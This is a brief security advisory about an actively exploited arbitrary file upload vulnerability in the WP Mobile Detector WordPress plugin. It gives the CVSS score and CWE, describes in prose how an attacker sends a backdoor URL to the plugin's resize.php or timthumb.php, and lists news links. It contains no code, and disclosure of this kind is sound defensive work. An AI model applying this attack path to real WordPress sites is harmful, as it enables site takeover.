Researchers at Sucuri said that attacks against WordPress sites running the plugin started on May 26.
Vulnerability details
Advisory: SB2016052901 - Arbitrary file upload in WP Mobile detector
Vulnerable component: WP Mobile detector
CVE-ID:
CVSSv3 score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
CWE-ID: CWE-20 - Improper input validation
Description:
The vulnerability allows a remote attacker to upload arbitrary files to compromise the target system.
The weakness exists due to the failure to validate and sanitize input. A remote attacker can send a request toresize.php or timthumb.php inside the plugin directory with the backdoor URL that contains a PHP code.
Successful exploitation of the vulnerability may result in malicious files uploading and vulnerable system compromising.
Note: the vulnerability was being actively exploited.
External links:
https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-d...
https://threatpost.com/wordpress-patches-zero-day-in-wp-mobile-detector-plugin/118458/ https://www.recoverwp.com/en/arbitrary-file-upload-vulnerability-in-wp-mobile-detector/
https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
http://news.softpedia.com/news/wordpress-sites-under-attack-from-new-zero-day-in-wp-mobile-detector-...
https://vulners.com/threatpost/WORDPRESS-PATCHES-ZERO-DAY-IN-WP-MOBILE-DETECTOR-PLUGIN/118458
http://www.spamfighter.com/News-20313-WordPress-Websites-Being-Assaulted-Through-Fresh-0-Day-within-...
http://www.builditdigital.com/blog/wp-mobile-detector-plugin-makes-over-10-000-wordpress-sites-vulne...
http://www.zdnet.com/article/over-10000-wordpress-sites-vulnerable-to-exploit/